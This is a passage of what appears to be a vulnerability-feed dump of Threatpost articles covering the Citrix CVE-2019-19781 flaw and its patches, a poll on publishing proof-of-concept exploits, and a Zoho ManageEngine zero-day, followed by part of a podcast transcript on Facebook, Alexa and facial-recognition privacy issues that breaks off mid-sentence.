can be performed by any external attacker,\u201d he noted in research released on Tuesday. \u201cThis vulnerability allows any unauthorized attacker to not only access published applications, but also attack other resources of the company\u2019s internal network from the Citrix server.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWhile neither Citrix nor Positive Technologies released technical details on the bug ([CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)), they said it affects all supported versions of the product, and all supported platforms, including Citrix ADC and Citrix Gateway 13.0, Citrix ADC and NetScaler Gateway 12.1, Citrix ADC and NetScaler Gateway 12.0, Citrix ADC and NetScaler Gateway 11.1, and also Citrix NetScaler ADC and NetScaler Gateway 10.5, according to the research.\n\n\u201cCitrix applications are widely used in corporate networks,\u201d said Dmitry Serebryannikov, director of security audit department at Positive Technologies, in a statement. \u201cThis includes their use for providing terminal access of employees to internal company applications from any device via the internet. Considering the high risk brought by the discovered vulnerability, and how widespread Citrix software is in the business community, we recommend information security professionals take immediate steps to mitigate the threat.\u201d\n\nCitrix released a [set of measures](<https://support.citrix.com/article/CTX267679>) to mitigate the vulnerability, including software updates, according to the researchers.\n\nThe vendor [made security news](<https://threatpost.com/citrix-confirms-password-spraying-heist/146641/>) earlier this year when cyberattackers used password-spraying techniques to make off with 6TB of internal documents and other data. The attackers intermittently accessed Citrix\u2019 infrastructure between October 13, 2018 and March 8, the company said, and the crooks \u201cprincipally stole business documents and files from a company shared network drive that has been used to store current and historical business documents, as well as a drive associated with a web-based tool used in our consulting practice.\u201d\n\nPassword-spraying is a related type of attack to brute-forcing and credential-stuffing. Instead of trying a large number of passwords against a single account, in password-spraying the adversary will try a single commonly used password (such as \u201c123456\u201d) against many accounts. If unsuccessful, a second password will be tried, and so on until accounts are cracked. This \u201clow and slow\u201d method is used to avoid account lock-outs stemming from too many failed login attempts.\n\nIn the case of Citrix, which has always specialized in federated architectures, the FBI surmised in March that the attackers likely gained a foothold with limited access, and then worked to circumvent additional layers of security. That was backed up by evidence that the attackers were trying to pivot to other areas of the infrastructure.\n", "modified": "2019-12-26T19:17:55", "published": "2019-12-26T19:17:55", "id": "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "href": "https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/", "type": "threatpost", "title": "Critical Citrix Bug Puts 80,000 Corporate LANs at Risk", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-17T01:54:02", "bulletinFamily": "info", "description": "Citrix has quickened its rollout of patches for a critical vulnerability ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) in the Citrix Application Delivery Controller (ADC) and Citrix Gateway products, on the heels of recent proof-of-concept exploits and skyrocketing exploitation attempts.\n\nSeveral versions of the products still remain unpatched \u2013 but they will be getting a patch sooner than they were slated to. While Citrix originally said some versions would get a patch Jan. 31, it has now also shortened that timeframe, saying fixes are forthcoming on Jan 24 (Friday of this week).\n\nAlso, Citrix patched Citrix ADC and Citrix Gateway version 11.1 (with firmware update Refresh Build 11.1.63.15) and 12 (firmware update Refresh Build 12.0.63.13) on Jan. 19 \u2014 a day earlier than it had expected to.\n\n[](<https://register.gotowebinar.com/register/7679724086205178371?source=art>)\n\nThe versions that Citrix expects to patch on Jan. 24 include Citrix ADC and Citrix Gateway version 10.5 (with Refresh Build 10.5.70.x), 12.1 (Refresh Build 12.1.55.x), 13 (Refresh Build 13.0.47.x), as well as Citrix SD-WAN WANOP Release 10.2.6 (with Citrix ADC Release 11.1.51.615) and Citrix SD-WAN WANOP Release 11.0.3 (Citrix ADC Release 11.1.51.615).\n\nWhen it was originally disclosed [in December](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>), the vulnerability did not have a patch, and Citrix [announced](<https://support.citrix.com/article/CTX267027>) it would not be issuing fixes for the gateway products and ADC (formerly called NetScaler ADC), a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web, until \u201clate January.\u201d\n\nHowever, in the following weeks after disclosure, various researchers published public [proof-of-concept (PoC) exploit code](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) for the flaw. At the same time, [researchers warned of active exploitations](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>), and [mass scanning activity](<https://twitter.com/bad_packets/status/1217234838446460929>), for the vulnerable Citrix products.\n\n> CVE-2019-19781 mass scanning activity from these hosts is still ongoing. <https://t.co/pK4Qus1eAo>\n> \n> \u2014 Bad Packets Report (@bad_packets) [January 14, 2020](<https://twitter.com/bad_packets/status/1217234838446460929?ref_src=twsrc%5Etfw>)\n\nIn one unique case of exploitation, [researchers at FireEye said last week](<https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html>) that a threat actor was targeting vulnerable Citrix devices with a previously-unseen payload, which they coined as \u201cNOTROBIN.\u201d\n\nResearchers said that the attack group behind the payload appeared to be scanning for vulnerable ADC devices and deploying their own malware on the devices, which would then delete any previously-installed malware. Researchers suspect that the threat actors may be trying to maintain their own backdoor access in compromised devices.\n\n\u201cUpon gaining access to a vulnerable NetScaler [ADC] device, this actor cleans up known malware and deploys NOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains backdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign,\u201d researchers said.\n\nWith patches now being available or soon to be rolled out, security experts urge customers to update as soon as possible.\n\n\u201cCISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP once the appropriate firmware updates become available,\u201d according to a Monday CISA alert on the patches. \u201cThe fixed builds can be downloaded from Citrix Downloads pages for [Citrix ADC](<https://www.citrix.com/downloads/citrix-adc/>) and [Citrix Gateway](<https://www.citrix.com/downloads/citrix-gateway/>). Until the appropriate update is accessible, users and administrators should apply Citrix\u2019s interim mitigation steps for CVE-2019-19781.\u201d\n\n**_Concerned about mobile security? _**[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) **_Top 8 Best Practices for Mobile App Security, on Jan. 22 at 2 p.m. ET. _**_**Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts from **_**_Secureworks and White Ops to discuss the secrets of building a secure mobile strategy, one app at a time. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)**_._**\n\nWrite a comment\n\n**Share this article:**\n\n * [Editor's Picks](<https://threatpost.com/category/editors-picks/>)\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n", "modified": "2020-01-21T17:19:28", "published": "2020-01-21T17:19:28", "id": "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "href": "https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/", "type": "threatpost", "title": "Citrix Accelerates Patch Rollout For Critical RCE Flaw", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-22T21:44:12", "bulletinFamily": "info", "description": "When it comes to the release of proof-of-concept (PoC) exploits, more security experts agree that the positives outweigh the negatives, according to a recent and informal Threatpost poll.\n\n[](<https://register.gotowebinar.com/register/7679724086205178371?source=art>)Last week, [Threatpost conducted a reader poll](<https://threatpost.com/poll-published-poc-exploits-good-bad/151966/>) and almost 60 percent of 230 security pundits thought it was a \u201cgood idea\u201d to publish PoC code for zero days. Up to 38 percent of respondents, meanwhile, argued it wasn\u2019t a good idea.\n\nThe debate comes on the heels of PoC code being released last week for an [unpatched remote-code-execution vulnerability](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) in the Citrix Application Delivery Controller (ADC) and Citrix Gateway products. The PoC exploits, which were published to showcase how the vulnerability in a system can be exploited, raised questions about the positive and negative consequences of releasing such code for an unpatched vulnerability.\n\nSome argued that the code can be used to test networks and pinpoint vulnerable aspects of a system, as well as motivate companies to patch, but others in the security space have argued that PoC code gives attackers a blueprint to launch and automate attacks.\n\n## Security Motivator\n\nMany security experts point to the role of PoC code publication in motivating impacted companies and manufacturers to adopt more effective security measures. That was the argument of one such advocate, Dr. Richard Gold, head of security engineering at Digital Shadows, who said that PoC code enables security teams to test if their systems are exploitable or not.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/21153903/tp-poll.png>)\n\n\u201cRather than having to rely on vendor notifications or software version number comparisons, a PoC allows the direct verification of whether a particular system is exploitable,\u201d Gold told Threatpost. \u201cThis ability to independently verify an issue allows organizations to better understand their exposure and make more informed decisions about remediation.\u201d\n\nIn fact, up to 85 percent of respondents said that the release of PoC code acts as an \u201ceffective motivator\u201d to push companies to patch. Seventy-nine percent say that the disclosure of a PoC exploit has been \u201cinstrumental\u201d in preventing an attack. And, 85 percent of respondents said that a PoC code release is acceptable if a vendor won\u2019t fix a bug in a timely manner.\n\nWhen it comes to the[ recent Citrix vulnerability (CVE-2019-19781)](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) for instance, advocates argue that, though PoC exploits were released before a patch was available, the code drew attention to the large amounts of vulnerable devices that were online. Citrix has also [accelerated its patch schedule](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) after PoC exploits were released (though there is no proof of correlation between this and the PoC exploit releases).\n\n\u201cAs a result [of the Citrix PoC exploits], there has been a widespread effort to patch or mitigate vulnerable devices rather than leaving them unpatched or unsecured,\u201d Gold stressed.\n\n## A Jump in Actual Exploits\n\nOn the flip-side of the argument, many argue that the release of the Citrix PoC exploits were a bad idea. They say attacks attempting to exploit the vulnerability skyrocketed as bad actors rushed to exploit the vulnerabilities before they are patched. In fact, 38 percent of respondents in Threatpost\u2019s poll argued that PoC exploit releases are a bad idea.\n\nMatt Thaxton, senior consultant at Crypsis Group, thinks that the \u201cultimate function of a PoC is to lower the bar for others to begin making use of the exploit.\u201d[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/21154131/tp-poll-2.png>)\n\n\u201cI believe there are more negatives than positives to publishing proofs, and generally, it is not a good idea,\u201d he told Threatpost. \u201cIn many cases, PoC\u2019s are put out largely for the notoriety/fame of the publisher and for the developer to \u2018flex\u2019 their abilities.\u201d\n\nJoseph Carson, chief security scientist at Thycotic, told Threatpost that while he thinks PoC exploits can have a positive impact, \u201cit is also important to include what defenders can do to reduce the risks such a methods to harden systems or best practices.\u201d\n\n\u201cLet\u2019s be realistic, once a zero-day is known, it is only a matter of time before nation states and cybercriminals are abusing them,\u201d said Carson. \u201cSometimes they already know about the zero-day and have been abusing them for years.\u201d\n\nRespondents in the poll were also split about the right amount of time that\u2019s appropriate to release PoC code after a flaw has been disclosed, with 29 percent arguing 90 days is the appropriate amount and others opting for one month (25 percent), one week (23 percent) or two weeks (14 percent).\n\nThis issue of a PoC exploit timeline also brings up important questions around patch management for companies dealing with the fallout of publicly-released code. Some, like Thaxton, say that PoC exploit advocates fail to recognize the complexity of patching large environments: \u201cI believe the release of PoC code functions more like an implied threat to anyone that doesn\u2019t patch: \u2018You\u2019d better patch . . . or else,'\u201d he said \u201cThis kind of threat would likely be unacceptable outside of the infosec world. This is even more obvious when PoCs are released before or alongside a patch for the vulnerability.\u201d\n\n## PoC Exploits Surge\n\nAt the end of the day, PoC exploits are continuing to be published. In fact, beyond the release of the Citrix PoC code, a slew of other PoC exploits were released last week, [including ones for](<https://threatpost.com/poc-exploits-published-for-microsoft-crypto-bug/151931/>) a recently patched [crypto-spoofing vulnerability](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) found by the [National Security Agency](<https://threatpost.com/podcast-nsa-reports-major-crypto-spoofing-bug-to-microsoft/151900/>) (NSA) and [reported to Microsoft](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>); and another for critical flaws impacting the [Cisco Data Center Network Manager](<https://threatpost.com/cisco-dcnm-flaw-exploit/151949/>) tool for managing network platforms and switches.\n\nGold, for his part, argued that distinguishing a fine line between a theoretical vulnerability and a successful exploitation of a real system makes all the difference when it comes to PoC exploits versus active exploits.\n\n\u201cOnce that threshold has been crossed, it is understood that attackers will most likely be exploiting this vulnerability in real attacks,\u201d he said. \u201cThis often provided impetus to companies to patch their systems.\u201d\n\n**_Concerned about mobile security? _**[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) **_Top 8 Best Practices for Mobile App Security, on Jan. 22 at 2 p.m. ET. _**_**Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts from **_**_Secureworks and White Ops to discuss the secrets of building a secure mobile strategy, one app at a time. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)**_._**\n\nWrite a comment\n\n**Share this article:**\n\n * [Editor's Picks](<https://threatpost.com/category/editors-picks/>)\n * [Featured](<https://threatpost.com/category/featured/>)\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "modified": "2020-01-22T11:01:52", "published": "2020-01-22T11:01:52", "id": "THREATPOST:48D622E76FCC26F28B32364668BB1930", "href": "https://threatpost.com/poc-exploits-do-more-good-than-harm-threatpost-poll/152053/", "type": "threatpost", "title": "PoC Exploits Do More Good Than Harm: Threatpost Poll", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-07T21:41:52", "bulletinFamily": "info", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. Steven Seeley of Source Incite, [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter, Thursday, along with a proof of concept (PoC) exploit. According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of the Desktop Central. The FileStorage class is used to store data for reading data to or from a file. The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost, attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \nExploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. Nate Warfield, a security researcher with Microsoft, pointed to[ at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitor users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. Also previously a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "modified": "2020-03-06T16:53:00", "published": "2020-03-06T16:53:00", "id": "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:52:11", "bulletinFamily": "info", "description": "Data privacy has been an outstanding theme this past week, and the Threatpost team discussed the biggest privacy related news. In the news wrap podcast for April 26, the team discussed the backstories behind several reports from the week, including:\n\n * Facebook potentially [facing Federal Trade Commission (FTC) fines](<https://threatpost.com/facebook-5-billion-ftc-fine/144104/>) as high as $5 billion for its data-security practices\n * A report that employees at Amazon can [access geolocation information](<https://threatpost.com/amazon-employees-personal-alexa/144119/>) for Alexa users\n * Questions around data security and consent around[ facial recognition](<https://threatpost.com/facial-recognition-consent-doesnt-exist-threatpost-poll-finds/144126/>) after the EU\u2019s approval of a massive biometrics database\n * The exposure of [2 million passwords](<https://threatpost.com/leaky_app_data/144029/>) for Wi-Fi hotspots online by an insecure database\n\n[\ufeff\n\n](<http://iframe%20style=border:%20none%20src=//html5-player.libsyn.com/embed/episode/id/9544445/height/360/theme/legacy/thumbnail/yes/direction/backward/%20height=360%20width=100%%20scrolling=no%20%20allowfullscreen%20webkitallowfullscreen%20mozallowfullscreen%20oallowfullscreen%20msallowfullscreen/iframe>)\n\n_Below is a lightly edited transcript of the podcast._\n\n**Lindsey O\u2019Donnell**: Welcome to the Threatpost podcast, and the Threatpost team is all here this Friday morning. You\u2019ve got Lindsey O\u2019Donnell and I\u2019m here with Tara Seals and Tom Spring. Hey, everyone.\n\n**Tara Seals:**Hey, Lindsey.\n\n**Tom Spring: **How\u2019s it going, Lindsey? How\u2019s it going, Tara?\n\n**Lindsey**: Good. So, privacy has really been kind of the name of the game this week, in terms of all the stories that we\u2019ve written. And I know, we had a lot of data privacy type stories, everything from Amazon Echo privacy issues to facial recognition. But if we\u2019re talking about data privacy, I think we should really start by bringing Facebook into the conversation here, as we usually do.\n\n**Tara: **Yeah, that seems to have been a top theme of the week for sure. And you did a ton of reporting on that this week.\n\n**Lindsey: **Yeah, so, the big news this week was that Facebook may be facing fines of between $3 to $5 billion for that FTC fine that was related to the Cambridge Analytica incident last year, and all of their data privacy issues that they\u2019ve had since then. So, Facebook had its earnings and disclosed this amount of money that is set aside as contingency expenses. And I feel like we keep hearing about reports of Facebook, having all these data sharing incidents, or having all these crazy data practices, but now we\u2019re really looking at the consequences. And everyone\u2019s wondering how data collection and sharing will be regulated and what kind of fines we\u2019ll see. So that should be interesting to keep an eye on how this actually plays out in the coming months.\n\n**Tara: **Yeah, and I wonder in terms of all of that, when we talk about the GDPR, over in Europe, and how it has really stringent requirements for explicit consent before somebody harvests your data, which obviously is not something that Facebook adheres to, for U.S. citizens anyway \u2013 have there been any rumblings out there in terms of whether or not Facebook might face future regulation?\n\n**Lindsey: **I think that\u2019s there\u2019s been a lot of discussion about it. I know, obviously, Mark Zuckerberg has appeared in front of Congress. And it\u2019s definitely been at the forefront of discussion. But beyond some state-level data privacy practice regulations, it\u2019s something that people are still trying to figure out. So I think that\u2019s kind of why this FTC fine is at the center of attention. There was news today, actually, that the _New York Times _was talking to sources who said that the FTC is discussing stronger monitoring of Facebook\u2019s privacy policies, as well as direct punishment of Mark Zuckerberg. So that raises questions about how to deal with data sharing, whether it\u2019s kind of hitting at the CEO, or even just imposing bigger fines. But Tara, I know, you listen to the actual earnings call. Were there any special call outs about the fine or data security in general? I\u2019m curious if they talked about it at all.\n\n**Tara:**They studiously avoided talking about the fines specifically, which, it\u2019s a charge off of, they added $3 billion, and they said it could go up to as much as $5 billion, and so that ate into their profit, which is kind of interesting, because they reported, I think it was, I don\u2019t have it in front of me, but I think it was around like $2.3 billion in profit for the quarter.\n\nAnd that that is taking into account that $3 billion contingency fine. And they didn\u2019t really specifically discuss it. But they did say that they expected profits to continue to waver a little bit going forward, due to regulatory headwinds, as well as advertising-related falloff, because they\u2019re not sure that they can make the same amount of revenue off of ad targeting that they have in the past.\n\nSo that sort of in a roundabout way speaks to the fact that they\u2019re looking into making some changes in terms of how they collect and use user data. But that\u2019s sort of reading between the lines, and they certainly didn\u2019t say anything explicit about it, unfortunately.\n\n**Lindsey: **Right. Well, I know one big point of discussion was, is this enough? How does this compare to past fines? Because I know Facebook has faced various fines in the past, which Tara you have actually written about. I think it was in December it was fined like $11 million. And then in October, it was fined $645,000. So obviously, those kind of shy away in comparison to $5 billion, but I think people are still kind of asking, how does this compare? Facebook\u2019s kind of overall \u2013\n\n**Tara: **Yeah, their overall profit, annual, you know, $3 to 5 billion is significant for them, actually.\n\n**Tom:**Well, I just looked it up. Facebook made more than $40 billion in revenue in 2017.\n\n**Tara: **What\u2019s the profit? That\u2019s the real marker right?\n\n**Tom: **Well, it is the real marker.\n\n**Lindsey: ** I\u2019m curious what will come out of it. But I do know that everyone\u2019s really looking at this as some sort of precedent for how Facebook will be regulated in the future, if it continues with the data security issues that have been happening over the past year, since Cambridge Analytica.\n\n**Tara: **One of the things too, Lindsey, that I wanted to ask you about was, you know, [the poll that we did](<https://threatpost.com/three-fourths-of-consumers-dont-trust-facebook-threatpost-poll-finds/143963/>) on attitudes towards Facebook. But, you know, also in the wake of their earnings that showed that they had seen an 8 percent year over year, subscriber jump, so the headlines, even though people are sort of horrified by them, they\u2019re not really dissuading people from actually using the platform, which I think is interesting. And then also their stock price just skyrocketed, after they reported their earnings, even with the charge off for the fine. So I don\u2019t know, I don\u2019t know what\u2019s going to happen in the future and whether any of this is going to make a difference in terms of whether or not it\u2019s successful as a company.\n\n**Tom: **I was just thinking, I think that, it\u2019d be interesting to watch the regulatory space to see what the U.S. does, especially with GDPR, in terms of what\u2019s going on in Europe, and really a constant sort of, you know, march of bad news in terms of privacy, and also with breaches that are taking place, not only with Facebook, but with a ton of other companies \u2013 I think what we\u2019re doing is we\u2019re setting up in 2020, and beyond some new rules around privacy and some new regulations around privacy. Because I mean, as you just pointed out, Tara, fines and threats and punishments are not really are impacting the way Facebook\u2019s doing business or hurting them in terms of their business model.\n\n**Lindsey: **Right. I don\u2019t think at all that people are going to stop using Facebook. And I mean, to be totally honest, even if they do adopt some sort of model where you pay to use the platform without advertising or without your data being collected and shared \u2013 I\u2019m not sure how many people would even opt in for that as well. I mean, I could be completely wrong. But I don\u2019t know if people are going to pay an extra like $5 a month or something to use a social media platform that\u2019s already free.\n\n**Tom: **Yeah, I don\u2019t think anybody\u2019s going to be paying. But I think what you\u2019ll see is probably some government intervention. That\u2019s my prediction. I mean, the things that we regulate here in the U.S. \u2013 these companies, whether it be Amazon, Google, or Facebook, they\u2019ve basically had a clear runway to do whatever they wanted for I don\u2019t know how many years. And, you know, if you think about all the different things that we regulate in this country, privacy really isn\u2019t one of them right now, but certainly isa right target for legislators to focus on.\n\n**Lindsey: **Right. That\u2019s the good point. Speaking of Amazon, I know, Tara, you covered a really interesting story this week too about news of their auditing program for Echo devices, which had already been reported. But now I guess a new report said that they\u2019re also exposing geolocation data, in addition to voice data. Can you add some color there?\n\n**Tara: **Sure. So, this story was really interesting to me. And it\u2019s not just Echo either. It\u2019s also, you know, the other Alexa devices including the Fire TV devices and there are tons of third-party gadgets that have Alexa built in now. So this is kind of a broad reaching story, from an Internet of Things perspective. But yeah, so apparently, and as you pointed out, this is something that _Bloomberg _had broken a story on about three weeks ago, talking about the fact that Amazon has a team of people in place that may manually audit Alexa interactions to make sure that the AI is learning appropriately. And it\u2019s been effective and accurate and returning good results for users, and all that kind of thing. But what\u2019s interesting is in the process of that, this data, which is supposed to be anonymous, right? So it\u2019s just sort of random snippets \u2013 human people will listen to this, and then see what Alexa\u2019s response was matched up, make sure that it\u2019s accurate, do whatever secret sauce they have to do with the algorithm and the AI to fix it, or to make her smarter \u2013 But in the process of this, apparently, geolocation data gets scooped up here. Because when people ask, Alexa, tell me what the weather forecast is, or Alexa, I\u2019m feeling like Chinese, is anybody delivering to my house, that type of thing. That necessarily, obviously, those local results have to be tied to geolocation data. So they\u2019re scooping up and harvesting and storing and logging GPS coordinates, in addition to sort of these random, other snippets. And so there were five different employees within Amazon that are working on this program, that basically came forward and said that they feel that nobody gave their consent for this and that it\u2019s too broad of an access for them to have. And then they actually on a whim, sort of plugged these coordinates into Google Maps and found that they could actually track somebody\u2019s place of business or their house, and even bring up a picture of that house. And through other means, actually identify who lives there, and then tie all this other information together and be able to create a very creative profile.\n\n**Tom: **I agree with you, Tara, I think that we need to be more concerned about the privacy that we hand over to these types of digital devices. And I\u2019m even more concerned now about the privacy issues that have surround geo-specific apps, where you\u2019re using an app and it understands where you\u2019re at and gives you sort of context-relevant information, and how that data is being used, and who\u2019s using it, and who\u2019s collecting it. When you think about Amazon, they\u2019re a much more potentially powerful company considering all the tentacles that it has into my buying and my data, and my home with their Alexa speakers.\n\n**Lindsey:**Yeah, that\u2019s a really good point. And I\u2019m curious too about the consent and notification side of all of this. I mean, did they have any response Tara about if they gave any notification that they were doing any of this at all? Is there anything on Amazon\u2019s website about this program?\n\n**Tara: **No, no, this was completely in the background until _Bloomberg _came forward with their report, they didn\u2019t acknowledge that it exists. And they just put out a statement saying, you know, we take privacy seriously. And saying, we limit, the number of people that have access to this, who are tasked with doing this as part of their job, and they\u2019re bound by, you know, all kinds of restrictions and things like that it\u2019s highly controlled.\n\n**Tom: **I gotta come back to the point where I feel like this is an area ripe for regulation. I\u2019m not pro regulation but I mean, if this is something that consumers are outraged about \u2013 I think there\u2019s got to be a GDPR type regulations that we\u2019re going to see here in the U.S. that that are going to impact the Facebook\u2019s and the Amazons in the world.\n\n**Tara: **Right and now, we have other types of privacy and sort of potentially intrusive privacy issues to worry about too \u2013 Lindsey, going back to some of the reporting you did this week, but with the facial recognition stuff is happening. You know that that seems like sort of the Wild West out there. There\u2019s no regulation around that.Right?\n\n**Lindsey: **Well, yeah, exactly. And the scary thing about that, too, is that a lot of the facial recognition applications out there are actually being used by the government. So by the Department of Homeland Security and by policemen and whatnot. But yeah, facial recognition came up in the headlines a bunch this week, because there\u2019s been two different incidents. The first was you guys may have heard the EU last week approved a massive biometrics database that would combine the data from law enforcement, from Border Patrol, and more for both EU and non US citizens. So there was that. And then there was another incident this week that occurred where a JetBlue passenger was boarding a flight. And she noticed that instead of scanning her boarding pass, or taking a look at her passport, she was directed to look into a camera, before being allowed on onto the jet bridge. So she was confused about what was going on and so tweeted at JetBlue. And it turns out, this was part of a Customs and Border Patrol program that\u2019s used in I think, 17 airports, where it uses facial recognition to identify passengers and let them through the gateway onto the plane. So her tweet went viral and kind of started this massive conversation about facial recognition and you know, if you can consent and where the data is coming from, how it\u2019s being shared. So that\u2019s been a really interesting story to cover, and kind of see the backlash and reaction to both of these incidents.\n\n**Tom: **I can relate to that. I recently 